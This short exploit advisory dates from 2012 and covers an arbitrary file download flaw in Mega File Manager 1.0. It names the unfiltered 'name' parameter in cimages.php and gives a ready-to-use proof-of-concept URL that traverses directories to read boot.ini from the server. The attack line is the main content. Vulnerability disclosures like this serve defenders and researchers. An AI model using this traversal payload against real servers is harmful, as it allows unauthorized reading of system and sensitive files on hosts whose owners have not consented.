Mega File Manager version 1.0 suffers from an arbitrary file download vulnerability.
82d8be8c8a197aff6162ca8c6654d71c3bbc7be6d45c8e286a8be96f62d01204
# Exploit Title: [MegaFileManager FileDownload Vulnerability
# date: 2012-04-19
# Author: i2sec-Min Gi Jo
# Software Link: http://www.awesomephp.com/?Download*5
# Version: Mega File Manager V 1.0
# Tested on: Windows
# Description : There is no filtering on 'cimages.php' parameter 'name'.
# PoC : http://[server]/megafilemanager/cimages.php?name=../../../../boot.ini